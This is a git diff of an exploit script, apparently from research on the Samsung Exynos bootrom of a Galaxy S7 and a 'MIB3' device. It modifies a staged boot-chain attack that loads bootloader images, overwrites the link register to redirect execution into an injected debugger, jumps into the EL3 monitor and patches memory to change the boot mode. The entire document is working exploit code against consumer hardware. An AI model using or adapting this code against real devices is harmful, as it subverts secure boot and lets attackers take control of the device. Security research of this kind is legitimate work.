diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 7a3d50e..fa8dea1 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -633,16 +633,16 @@ class ExynosDevice(): DEBUGGER_ADDR = 0x2069000 # 0x2069000 # Dump contents of TTBR0_EL3 from memory into a pandas dataframe and write it to a pickle file - import pandas as pd - blub = self.cd.memdump_region(0x02035000, 0x1000) - try: - df = pd.read_pickle('ttbr0_el3.pkl') - # Concat data to existing dataframe - df = pd.concat([df, pd.Series([blub])], ignore_index=True) - except: - df = pd.DataFrame() - df['TTBR0_EL3'] = [blub] - df.to_pickle('ttbr0_el3.pkl') + #import pandas as pd + #blub = self.cd.memdump_region(0x02035000, 0x1000) + #try: + # df = pd.read_pickle('ttbr0_el3.pkl') + # # Concat data to existing dataframe + # df = pd.concat([df, pd.Series([blub])], ignore_index=True) + #except: + # df = pd.DataFrame() + # df['TTBR0_EL3'] = [blub] + #df.to_pickle('ttbr0_el3.pkl') # Relocate debugger debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read() @@ -650,15 +650,16 @@ class ExynosDevice(): DEBUGGER_ADDR = 0x11200000 # Load bootloader stages - bl1 = open("../S7/g930f_latest/fwbl1_a.bin", "rb").read() - bl31 = open("../S7/g930f_latest/el3_mon_a.bin", "rb").read() - bl2 = open("../S7/g930f_latest/bl2_a.bin", "rb").read() - bl33 = open("../S7/g930f_latest/u-boot.bin", "rb").read() + + bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read() + bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read() + bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() + bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() if args.MIB3: - bl1 = open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read() - bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read() - bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() - bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() + bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read() + bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read() + bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read() + bl33 = open("../mib3/boot_partitions/u-boot_a.bin", "rb").read() # Test debugger connection self.cd.test_connection() @@ -747,6 +748,9 @@ class ExynosDevice(): self.usb_read(0x200) # GiAs # self.cd.memwrite_region(0x02031008, b"ELH") + # Get pointer to BL31 + BL31_POINTER = self.cd.arch_dbg.state.LR + self.cd.arch_dbg.state.LR = DEBUGGER_ADDR TTBR0_EL3 = 0x02035600 # Zeroed out @@ -760,9 +764,9 @@ class ExynosDevice(): # self.cd.memwrite_region(0x02021580, struct.pack('>I', 0x00000000)) # Jump into BL31 and execute it - BL31_POINTER = 0x02024010 - if args.MIB3: - BL31_POINTER = 0x020c0000 + #BL31_POINTER = 0x02024010 + #if args.MIB3: + # BL31_POINTER = 0x020c0000 self.cd.restore_stack_and_jump(BL31_POINTER) # Obligatory reconnect and check of debugger @@ -784,7 +788,9 @@ class ExynosDevice(): VBAR_EL3 = self.cd.arch_dbg.state.VBAR_EL3 self.test_write_execute(0x11207010) - # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR + + if args.MIB3: + self.cd.arch_dbg.state.LR = DEBUGGER_ADDR self.cd.restore_stack_and_jump(hijacked_fun) # ==== Stage 4 BL2 ==== @@ -813,15 +819,17 @@ class ExynosDevice(): self.cd.arch_dbg.state.X23 = DEBUGGER_ADDR # TEMPORARY self.cd.restore_stack_and_jump(hijacked_fun) + time.sleep(1) + self.connect_device() + + self.send_normal_stage(bl33) # Never return/completes + self.connect_device() + self.usb_read(0x200) # GiAs # print_payload = open("/home/jonathan/projects/samsung_s7/source/screen_print/print.bin", "rb").read() # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9")) # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):] - self.send_normal_stage(bl33) - self.connect_device() - self.usb_read(0x200) # GiAs - # Change bootmode to SDCARD (allow normal booting, if pressing volume up) self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035)) self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))